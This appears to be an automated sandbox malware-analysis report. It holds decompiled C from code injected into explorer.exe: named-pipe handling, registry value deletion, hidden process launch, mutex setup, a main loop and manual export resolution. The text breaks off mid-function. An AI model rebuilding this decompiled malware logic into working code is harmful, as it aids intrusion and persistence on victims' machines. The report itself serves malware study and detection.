                            0x00083329
                            0x00083397
                            0x00083398
                            0x0008339b
                            0x0008339c
                            0x000833a3
                            0x000833ae
                            0x000833b0
                            0x0008332b
                            0x0008332c
                            0x0008332f
                            0x0008337f
                            0x00000000
                            0x00083331
                            0x00083331
                            0x00083334
                            0x00083369
                            0x00000000
                            0x00083336
                            0x00083336
                            0x00083339
                            0x00083353
                            0x00083358
                            0x0008335b
                            0x00083386
                            0x00083387
                            0x00083388
                            0x0008335d
                            0x0008335d
                            0x00083360
                            0x00083361
                            0x00083361
                            0x0008338a
                            0x0008338b
                            0x0008333b
                            0x0008333e
                            0x00083348
                            0x0008336e
                            0x0008336e
                            0x00083373
                            0x00083374
                            0x0008349d
                            0x0008349d
                            0x0008349e
                            0x000834a3
                            0x000834a3
                            0x0008333e
                            0x00083339
                            0x00083334
                            0x0008332f
                            0x00083329
                            0x00083320
                            0x000834b4
                            0x000834bc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x000834bc
                            0x000834c8

                            APIs
                            • ConnectNamedPipe.KERNELBASE(00000000), ref: 000832C6
                            • GetLastError.KERNEL32 ref: 000832D0
                              • Part of subcall function 0008C319: FlushFileBuffers.KERNEL32(000001FC), ref: 0008C35F
                            • DisconnectNamedPipe.KERNEL32 ref: 000834B4
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
                            • String ID:
                            • API String ID: 2389948835-0
                            • Opcode ID: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
                            • Instruction ID: aec34d1c461da35ce7ea10a51bd790cfc71f6dd0dd97058cb51a1121444265f8
                            • Opcode Fuzzy Hash: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
                            • Instruction Fuzzy Hash: 4151E472A00215ABEB61FFA4DC89AEEBBB8FF45750F104026F584A6151DB749B44CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000861B4, Relevance: 6.1, APIs: 4, Instructions: 145registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 384 861b4-861f9 memset call 88604 387 861ff-86211 call 88604 384->387 388 86363-86369 384->388 387->388 391 86217-86234 RegOpenKeyExW 387->391 392 8623a-8626d 391->392 393 86333-86337 391->393 398 8627f-86284 392->398 399 8626f-8627a 392->399 394 86339-8633e 393->394 395 86344-8635b call 8861a * 2 393->395 394->395 403 86360 395->403 398->393 401 8628a 398->401 399->393 405 8628d-862dc memset * 2 401->405 403->388 407 862de-862ee 405->407 408 86326-8632d 405->408 410 862f0-86304 407->410 411 86323 407->411 408->393 408->405 410->411 413 86306-86313 call 8c392 410->413 411->408 416 8631c-8631e call 8b1b1 413->416 417 86315-86317 413->417 416->411 417->416
                            C-Code - Quality: 80%
                            			E000861B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				intOrPtr _t63;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t98 = E00088604(0x3fff);
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E00088604(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						_t63 =  *0x9e68c; // 0xc2fab8
						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
					}
					E0008861A( &_v32, 0x3fff); // executed
					E0008861A( &_v36, 0x800); // executed
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0x9e68c; // 0xc2fab8
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						memset(_t97, 0, 0x800);
						memset(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0x9e68c; // 0xc2fab8
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0x9e690; // 0xc2fb90
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0x9e68c; // 0xc2fab8
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E0008C392(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E0008B1B1(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0x9e68c; // 0xc2fab8
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}
































                            0x000861b4
                            0x000861b4
                            0x000861c0
                            0x000861cf
                            0x000861d2
                            0x000861dc
                            0x000861e4
                            0x000861e7
                            0x000861ef
                            0x000861f1
                            0x000861f4
                            0x000861f9
                            0x00086365
                            0x00086369
                            0x00086369
                            0x00086209
                            0x0008620b
                            0x00086211
                            0x00000000
                            0x00000000
                            0x00086234
                            0x00086333
                            0x00086337
                            0x00086339
                            0x00086341
                            0x00086341
                            0x0008634d
                            0x0008635b
                            0x00000000
                            0x00086360
                            0x0008623d
                            0x00086241
                            0x00086245
                            0x00086249
                            0x0008624d
                            0x0008624e
                            0x0008624f
                            0x00086250
                            0x00086251
                            0x00086255
                            0x0008625c
                            0x0008625d
                            0x00086262
                            0x0008626d
                            0x00086282
                            0x00086284
                            0x00000000
                            0x00000000
                            0x0008628a
                            0x0008628d
                            0x00086295
                            0x000862a2
                            0x000862a7
                            0x000862aa
                            0x000862b3
                            0x000862ba
                            0x000862ca
                            0x000862d4
                            0x000862da
                            0x000862dc
                            0x000862e1
                            0x000862ea
                            0x000862ec
                            0x000862ee
                            0x000862f0
                            0x000862fa
                            0x00086300
                            0x00086304
                            0x00086308
                            0x0008630d
                            0x00086313
                            0x00086315
                            0x00086317
                            0x00086317
                            0x0008631e
                            0x0008631e
                            0x00086304
                            0x00086323
                            0x00086323
                            0x00086326
                            0x00086327
                            0x0008632a
                            0x0008632a
                            0x00000000
                            0x0008628d
                            0x0008626f
                            0x00086277
                            0x00000000

                            APIs
                            • memset.MSVCRT ref: 000861D2
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 0008622C
                            • memset.MSVCRT ref: 00086295
                            • memset.MSVCRT ref: 000862A2
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset$AllocateHeapOpen
                            • String ID:
                            • API String ID: 2508404634-0
                            • Opcode ID: 8a8df3ec20745d9b8db935e1207a51dcdf7b99798a4571e88c74bfd6093f7efc
                            • Instruction ID: 5df326356aa9df0f49ed8f656d01e6deee27922878838a2d55d254d8868e0780
                            • Opcode Fuzzy Hash: 8a8df3ec20745d9b8db935e1207a51dcdf7b99798a4571e88c74bfd6093f7efc
                            • Instruction Fuzzy Hash: 6C5128B1A00209AFEB51EF94CC85FEE7BBCBF04340F118069F545A7252DB759E048B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A911, Relevance: 6.1, APIs: 4, Instructions: 74processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 419 8a911-8a941 memset 420 8a94c-8a971 CreateProcessW 419->420 421 8a943-8a948 419->421 422 8a9ae 420->422 423 8a973-8a976 420->423 421->420 424 8a9b0-8a9b6 422->424 425 8a978-8a988 423->425 426 8a996-8a9a6 CloseHandle 423->426 425->426 429 8a98a-8a990 GetExitCodeProcess 425->429 427 8a9ac 426->427 427->424 429->426
                            C-Code - Quality: 65%
                            			E0008A911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				signed int _t24;
				intOrPtr _t32;
				intOrPtr _t34;
				int _t42;
				WCHAR* _t44;

				_t42 = 0x44;
				memset( &_v92, 0, _t42);
				_v92.cb = _t42;
				asm("stosd");
				_t44 = 1;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 = _a16;
				if(_t24 != 0) {
					_v92.dwFlags = 1;
					_v92.wShowWindow = 0;
				}
				asm("sbb eax, eax");
				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
					_t44 = 0;
				} else {
					if(_a8 != 0) {
						_push(_a12);
						_t34 =  *0x9e684; // 0xc2f8f0
						_push(_v20.hProcess);
						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
							GetExitCodeProcess(_v20.hProcess, _a8);
						}
					}
					CloseHandle(_v20.hThread);
					_t32 =  *0x9e684; // 0xc2f8f0
					 *((intOrPtr*)(_t32 + 0x30))(_v20);
				}
				return _t44;
			}










                            0x0008a91c
                            0x0008a925
                            0x0008a92c
                            0x0008a934
                            0x0008a938
                            0x0008a939
                            0x0008a93a
                            0x0008a93b
                            0x0008a93c
                            0x0008a941
                            0x0008a945
                            0x0008a948
                            0x0008a948
                            0x0008a955
                            0x0008a971
                            0x0008a9ae
                            0x0008a973
                            0x0008a976
                            0x0008a978
                            0x0008a97b
                            0x0008a980
                            0x0008a988
                            0x0008a990
                            0x0008a990
                            0x0008a988
                            0x0008a99e
                            0x0008a9a1
                            0x0008a9a9
                            0x0008a9a9
                            0x0008a9b6

                            APIs
                            • memset.MSVCRT ref: 0008A925
                            • CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,0008C1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 0008A96C
                            • GetExitCodeProcess.KERNELBASE(00000000,?), ref: 0008A990
                            • CloseHandle.KERNELBASE(?), ref: 0008A99E
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseCodeCreateExitHandlememset
                            • String ID:
                            • API String ID: 2668540068-0
                            • Opcode ID: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                            • Instruction ID: 69c2d589c2e0a2c9629c015d340a78d4e10d2ecd89ef4d1a65b39d481363986c
                            • Opcode Fuzzy Hash: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                            • Instruction Fuzzy Hash: C0215C72A00118BFEF519FA9DC84EAFBBBCFF08380B014426FA55E6560D6349C00CB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008B012, Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 430 8b012-8b079 memset * 2 SHGetFolderPathW call 8b946 433 8b07c-8b07e 430->433 434 8b0ab-8b0dd call 8c392 lstrcpynW 433->434 435 8b080-8b094 call 8bb8d 433->435 435->434 439 8b096-8b0a7 435->439 439->434
                            C-Code - Quality: 87%
                            			E0008B012(void* __ecx, WCHAR* __edx) {
				int _v8;
				void _v528;
				char _v1046;
				void _v1048;
				intOrPtr _t21;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				WCHAR* _t47;
				void* _t49;

				_t39 = __ecx;
				_v8 = 0x104;
				_t47 = __edx;
				memset( &_v1048, 0, 0x208);
				memset( &_v528, 0, 0x208);
				_t21 =  *0x9e698; // 0xc2fbc8
				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
				_t49 = E0008B946(_t39);
				_t26 =  *0x9e6b8; // 0xc2fbd8
				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
				if(_t27 == 0) {
					_t33 =  *0x9e688; // 0xb0000
					if(E0008BB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
						_t36 =  *0x9e698; // 0xc2fbc8
						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
					}
				}
				_t40 =  *0x9e684; // 0xc2f8f0
				 *((intOrPtr*)(_t40 + 0x30))(_t49);
				lstrcpynW(_t47,  &_v1046 + E0008C392( &_v528) * 2, 0x104);
				return 1;
			}
















                            0x0008b012
                            0x0008b023
                            0x0008b035
                            0x0008b037
                            0x0008b045
                            0x0008b054
                            0x0008b05f
                            0x0008b067
                            0x0008b074
                            0x0008b07a
                            0x0008b07e
                            0x0008b080
                            0x0008b094
                            0x0008b09d
                            0x0008b0a8
                            0x0008b0a8
                            0x0008b094
                            0x0008b0ab
                            0x0008b0b2
                            0x0008b0d0
                            0x0008b0dd

                            APIs
                            • memset.MSVCRT ref: 0008B037
                            • memset.MSVCRT ref: 0008B045
                            • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 0008B05F
                              • Part of subcall function 0008B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B959
                              • Part of subcall function 0008B946: GetLastError.KERNEL32(?,?,0008BA7C,74EC17D9,10000000), ref: 0008B967
                              • Part of subcall function 0008B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B980
                            • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 0008B0D0
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
                            • String ID:
                            • API String ID: 3158470084-0
                            • Opcode ID: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                            • Instruction ID: 19c7f563789c793ddff4382733eb78b8a69f152fd9c3ce08f6bae5569c2b2d08
                            • Opcode Fuzzy Hash: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                            • Instruction Fuzzy Hash: FA218EB2501218BFE710EBA4DCC9EDB77BCBB49354F1040A5F20AD7192EB749E458B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008BF37, Relevance: 6.1, APIs: 4, Instructions: 72registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 442 8bf37-8bf66 RegOpenKeyExW 443 8bf68-8bf6a 442->443 444 8bf6c-8bf8a RegQueryValueExW 442->444 445 8bfda-8bfdc 443->445 446 8bf8c-8bf9c call 88604 444->446 447 8bfc7-8bfca 444->447 446->447 453 8bf9e-8bfb8 RegQueryValueExW 446->453 449 8bfcc-8bfd1 447->449 450 8bfd7 447->450 449->450 452 8bfd9 450->452 452->445 454 8bfba-8bfc6 call 8861a 453->454 455 8bfdd-8bfea RegCloseKey 453->455 454->447 455->452
                            C-Code - Quality: 100%
                            			E0008BF37(short* __edx, short* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				char* _v20;
				char* _t30;
				intOrPtr _t31;
				char* _t49;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
						L6:
						if(_v8 != 0) {
							_t31 =  *0x9e68c; // 0xc2fab8
							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
						}
						_t30 = 0;
						L9:
						return _t30;
					}
					_t49 = E00088604(_v12);
					_v20 = _t49;
					if(_t49 == 0) {
						goto L6;
					}
					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
						RegCloseKey(_v8);
						_t30 = _t49;
						goto L9;
					}
					E0008861A( &_v20, 0xfffffffe);
					goto L6;
				}
				return 0;
			}










                            0x0008bf55
                            0x0008bf58
                            0x0008bf5b
                            0x0008bf66
                            0x0008bf8a
                            0x0008bfc7
                            0x0008bfca
                            0x0008bfcc
                            0x0008bfd4
                            0x0008bfd4
                            0x0008bfd7
                            0x0008bfd9
                            0x00000000
                            0x0008bfd9
                            0x0008bf94
                            0x0008bf96
                            0x0008bf9c
                            0x00000000
                            0x00000000
                            0x0008bfb8
                            0x0008bfe5
                            0x0008bfe8
                            0x00000000
                            0x0008bfe8
                            0x0008bfc0
                            0x00000000
                            0x0008bfc6
                            0x00000000

                            APIs
                            • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,00082C08,00000000), ref: 0008BF5E
                            • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,?,00000000,00082C08,00000000,?,?,00082C08,00000000), ref: 0008BF82
                            • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,00000000,00000000,00082C08,?,?,00082C08,00000000), ref: 0008BFB0
                            • RegCloseKey.KERNEL32(00000000,?,?,00082C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 0008BFE5
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: QueryValue$CloseOpen
                            • String ID:
                            • API String ID: 1586453840-0
                            • Opcode ID: 7e5c6c0b12421700877791a8b1243c8e4f1c457698047c2e59d80b208f0cb83c
                            • Instruction ID: 30ccd786ff8b7b84f14da17d4d39020c4d4bce544ae74224a6a2efcb0f455484
                            • Opcode Fuzzy Hash: 7e5c6c0b12421700877791a8b1243c8e4f1c457698047c2e59d80b208f0cb83c
                            • Instruction Fuzzy Hash: 3121E8B6900118FFDB50EBA9DC48E9EBBF8FF88750B1541AAF645E6162D7309A00DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008BE9B, Relevance: 6.1, APIs: 4, Instructions: 69registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 458 8be9b-8bec3 RegOpenKeyExA 459 8bec9-8bee6 RegQueryValueExA 458->459 460 8bec5-8bec7 458->460 462 8bee8-8bef7 call 88604 459->462 463 8bf21-8bf24 459->463 461 8bf33-8bf36 460->461 462->463 468 8bef9-8bf13 RegQueryValueExA 462->468 465 8bf31 463->465 466 8bf26-8bf2e RegCloseKey 463->466 465->461 466->465 468->463 469 8bf15-8bf1a 468->469 469->463 470 8bf1c-8bf1f 469->470 470->463
                            C-Code - Quality: 100%
                            			E0008BE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr* _t43;
				char* _t46;

				_t46 = 0;
				_v8 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
					return 0;
				}
				_v12 = 0;
				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
					_t46 = E00088604(_v12 + 1);
					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
						_t43 = _a12;
						if(_t43 != 0) {
							 *_t43 = _v12;
						}
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t46;
			}








                            0x0008beae
                            0x0008beb8
                            0x0008bebb
                            0x0008bec3
                            0x00000000
                            0x0008bec5
                            0x0008becc
                            0x0008bee6
                            0x0008bef2
                            0x0008bef7
                            0x0008bf15
                            0x0008bf1a
                            0x0008bf1f
                            0x0008bf1f
                            0x0008bf1a
                            0x0008bef7
                            0x0008bf24
                            0x0008bf2e
                            0x0008bf2e
                            0x00000000

                            APIs
                            • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,00C2FC08,00000000,?,00000002), ref: 0008BEBE
                            • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BEE1
                            • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BF0E
                            • RegCloseKey.KERNEL32(?,?,00000002), ref: 0008BF2E
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: QueryValue$CloseOpen
                            • String ID:
                            • API String ID: 1586453840-0
                            • Opcode ID: 7a4cdaf7386973441e4760f86288c6c940ee8b5e5eb7e5f1cc676981f8255861
                            • Instruction ID: a503bc69bf056dc60d578d60e72969ac8cbe77b2aa393cc8f9a4dd6054926014
                            • Opcode Fuzzy Hash: 7a4cdaf7386973441e4760f86288c6c940ee8b5e5eb7e5f1cc676981f8255861
                            • Instruction Fuzzy Hash: 0921A4B5A00148BF9B61DFA9DC44DAEBBF8FF98740B1141A9B945E7211D7309E00DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00085631, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97sleepsynchronizationCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 78%
                            			E00085631(void* __edx, void* __edi) {
				char _v44;
				void* _t8;
				intOrPtr _t11;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t20;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t40;
				intOrPtr _t49;
				void* _t54;

				_t54 = __edi;
				_t8 = E00089E66(0x3b); // executed
				if(_t8 != 0xffffffff) {
					L2:
					E0008980C(0x9e6c8);
					_t39 = 0x37; // executed
					E00089F06(_t39);
					_t11 =  *0x9e688; // 0xb0000
					_t40 = 0x3a; // executed
					E00089F06(_t40); // executed
					E0008E4C1(_t63);
					_t14 =  *0x9e688; // 0xb0000
					_t41 =  &_v44;
					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
					E0008A86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
					_t17 =  *0x9e684; // 0xc2f8f0
					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0x9e6c8,  *0x9e6cc);
					 *0x9e74c = _t18;
					if(_t18 != 0) {
						_t20 = CreateMutexA(0, 0, 0);
						 *0x9e76c = _t20;
						__eflags = _t20;
						if(_t20 != 0) {
							_t34 = E00088604(0x1000);
							_t52 = 0;
							 *0x9e770 = _t34;
							_t49 =  *0x9e774; // 0x2
							__eflags = _t34;
							_t41 =  !=  ? 0 : _t49;
							 *0x9e774 =  !=  ? 0 : _t49; // executed
						}
						E0008153B(_t41, _t52); // executed
						E000898EE(E00082EDA, 0, __eflags, 0, 0); // executed
						E00083017(); // executed
						E000831C2(0, __eflags); // executed
						E000829B1(); // executed
						E00083BB2(_t54, __eflags); // executed
						while(1) {
							__eflags =  *0x9e758; // 0x0
							if(__eflags != 0) {
								break;
							}
							E0008980C(0x9e750);
							_push(0x9e750);
							_push(0x9e750); // executed
							E0008279B();
							Sleep(0xfa0);
						}
						E00083D34();
						E00089A8E();
						E000834CB();
						_t33 = 0;
						__eflags = 0;
					} else {
						goto L3;
					}
				} else {
					_t36 = E00082DCB();
					_t63 = _t36;
					if(_t36 != 0) {
						L3:
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}

















                            0x00085631
                            0x0008563d
                            0x00085646
                            0x00085651
                            0x00085656
                            0x00085669
                            0x0008566a
                            0x0008566f
                            0x0008567f
                            0x00085680
                            0x00085688
                            0x0008568d
                            0x00085692
                            0x0008569c
                            0x0008569f
                            0x000856a9
                            0x000856b1
                            0x000856b7
                            0x000856be
                            0x000856d0
                            0x000856d6
                            0x000856db
                            0x000856dd
                            0x000856e4
                            0x000856e9
                            0x000856eb
                            0x000856f1
                            0x000856f7
                            0x000856f9
                            0x000856fc
                            0x000856fc
                            0x00085702
                            0x00085710
                            0x00085717
                            0x0008571c
                            0x00085721
                            0x00085726
                            0x00085750
                            0x00085750
                            0x00085756
                            0x00000000
                            0x00000000
                            0x00085732
                            0x00085737
                            0x00085738
                            0x00085739
                            0x0008574a
                            0x0008574a
                            0x00085758
                            0x0008575d
                            0x00085762
                            0x00085767
                            0x00085767
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00085648
                            0x00085648
                            0x0008564d
                            0x0008564f
                            0x000856c0
                            0x000856c2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0008564f
                            0x0008576d

                            APIs
                            • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000856D0
                              • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                              • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                            • Sleep.KERNELBASE(00000FA0), ref: 0008574A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$CreateFileMutexSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: ?xSa
                            • API String ID: 3249252070-2026721626
                            • Opcode ID: 3562f7877b88b9be417dacf07b104c639c27ee61355e5b92e6b06fab33a1451d
                            • Instruction ID: 618d9e32d6944c2961c1c58ef027407fe41e2fb87ac27e57644674ab890b217f
                            • Opcode Fuzzy Hash: 3562f7877b88b9be417dacf07b104c639c27ee61355e5b92e6b06fab33a1451d
                            • Instruction Fuzzy Hash: 0031D6312056509BF724FBB5EC069EA3B99FF557A0B144126F5C9861A3EE349900C763
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 521 8dfad-8dfc4 522 8e021 521->522 523 8dfc6-8dfee 521->523 524 8e023-8e027 522->524 523->522 525 8dff0-8e013 call 8c379 call 8d400 523->525 530 8e028-8e03f 525->530 531 8e015-8e01f 525->531 532 8e041-8e049 530->532 533 8e095-8e097 530->533 531->522 531->525 532->533 534 8e04b 532->534 533->524 535 8e04d-8e053 534->535 536 8e063-8e074 535->536 537 8e055-8e057 535->537 539 8e079-8e085 LoadLibraryA 536->539 540 8e076-8e077 536->540 537->536 538 8e059-8e061 537->538 538->535 538->536 539->522 541 8e087-8e091 GetProcAddress 539->541 540->539 541->522 542 8e093 541->542 542->524
                            C-Code - Quality: 100%
                            			E0008DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
